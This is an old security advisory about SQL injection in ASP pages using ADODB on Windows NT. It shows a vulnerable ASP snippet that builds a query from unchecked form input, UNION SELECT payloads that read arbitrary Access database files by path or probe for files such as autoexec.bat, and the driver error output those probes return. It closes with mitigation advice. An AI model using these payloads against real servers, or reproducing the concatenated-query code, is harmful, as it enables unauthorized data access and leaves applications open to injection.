COMMAND
SQL
SYSTEMS AFFECTED
WinNT
PROBLEM
Jess Lopez de Aguileta found following. It was tested on
- WinNT Spanish SP5
- Data Access 2.1
- Option Pack 4
The following SQL works in a ADODB connection inside ASP. select
field1,field2 from table_DSN_DB where field1=21 union select
address,path from
\winnt\profiles\administrador\escritorio\report.mdb.scanner
The first sentence (on the left-side from 'union') is the valid
query. A DSN exists and is pointing the DB containing the table
"table_DSN_DB". But the second appended query did not have any
DSN pointing to it. For this example you may use a Retina scanner
report. Obviously IUSR_Server must have ACL authorization to the
file "report.mdb" for this to work.
Now thing in a typical code like this:
set conect_to = Server.CreateObject("ADODB.Connection")
conect_to.open "validDSN"
SQLQuery = "select family,description from table where family=" &
request.form("family_of_item")
set lot_of_registers=conect_to.execute (SQLQuery)
do while not lot_of_registers.EOF
response.write( lot_of_registers.fields("family"))
response.write( lot_of_registers.fields("description"))
lot_of_registers.movenext
loop
It would be easy to tweak this query to access any database on the
NT. The standard error report from the IIS allows you to tune
your query.
But there is more: you can check for installation of vulnerable
programs/scripts. If exists:
select family,description from table where family=21 union select * from \autoexec.bat.mdb
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\AUTOEXEC.BAT'.
If not exists:
select family,description from table where family=21 union select * from \other_autoexec.bat.mdb
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\other_autoexec.bat'.
SOLUTION
- Check the ACL from all your access databases in the NT box.
- Check ALL the input from any form that could be used to
construct a SQL query.